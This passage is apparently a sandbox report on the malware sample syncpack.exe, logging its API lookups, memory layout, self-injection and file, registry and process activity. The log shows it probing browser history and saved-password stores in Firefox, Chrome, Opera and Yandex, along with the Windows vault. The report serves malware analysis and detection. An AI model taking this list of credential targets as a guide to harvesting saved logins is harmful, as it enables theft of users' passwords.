Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Fn
Module (37)
»
Operation Module Additional Information Success Count Logfile
Load C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL base_address = 0x6feb0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 1
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75fc359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x7604410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x760446b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76056676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x760447e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x760447f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75fdeee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (1)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:23 (UTC) True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #11: syncpack.exe
405 0
»
Information Value
ID #11
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x728
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 730
0x 7D4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
tzres.dll 0x00260000 0x00260fff Memory Mapped File Readable False False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00268fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00276fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00328fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x00970fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000980000 0x00980000 0x01d7ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d80000 0x01d80000 0x01e7ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x02300fff Private Memory Readable, Writable True False False -
nss3.dll 0x02200000 0x023b1fff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0256ffff Private Memory Readable, Writable True False False -
private_0x0000000002500000 0x02500000 0x025fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002600000 0x02600000 0x029f2fff Pagefile Backed Memory Readable True False False -
msvcp100.dll 0x6fe00000 0x6fe68fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
mozglue.dll 0x6fec0000 0x6fee1fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6fef0000 0x6ffadfff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x6ffb0000 0x6ffb6fff Memory Mapped File Readable, Writable, Executable False False False -
nss3.dll 0x6ffc0000 0x70174fff Memory Mapped File Readable, Writable, Executable False False False -
vaultcli.dll 0x70180000 0x7018bfff Memory Mapped File Readable, Writable, Executable False False False -
winmm.dll 0x70250000 0x70281fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x74690000 0x746b6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x74a30000 0x74a7efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x750d0000 0x750e6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x755d0000 0x7561efff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x755d0000 0x755e6fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x755f0000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 os_tid = 0x730, address = 0x0 True 1
Fn
Host Behavior
File (226)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\history.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite type = time True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\nss3.dll type = file_attributes True 3
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Sea Monkey\nss3.dll type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 23
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 23
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 8, size_out = 8 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat size = 256, size_out = 256 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 256, size_out = 256 True 2
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 8, size_out = 8 True 94
Fn
Data
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 256, size_out = 256 True 2
Fn
Data
Write - size = 3 True 1
Fn
Data
Write - size = 1 True 8
Fn
Data
Write - size = 11 True 1
Fn
Data
Write - size = 9 True 1
Fn
Data
Write - size = 8 True 1
Fn
Data
Write - size = 17 True 1
Fn
Data
Write - size = 15 True 1
Fn
Data
Write - size = 14 True 1
Fn
Data
Write - size = 12 True 1
Fn
Data
Write - size = 13 True 1
Fn
Data
Write - size = 2 True 1
Fn
Data
Registry (15)
»
Operation Key Additional Information Success Count Logfile
Open Key Mozilla Firefox\bin - False 3
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys - - True 3
Fn
Enumerate Keys - - False 3
Fn
Process (66)
»
Operation Process Additional Information Success Count Logfile
Get filename c:\windows\system32\taskhost.exe file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\system32\dwm.exe file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\explorer.exe file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\system32\conhost.exe file_name = C:\Windows\System32\conhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\windows photo viewer\lies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\senttracebowlingnames.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\signals cite try strings.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\victoria_purchased_scales_ecology.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows defender\rehabdroptracy.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows photo viewer\stating conditions loss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla maintenance service\erignoredwellserving.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\fixtures counting blink.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\wr_lotus.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\biblical.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
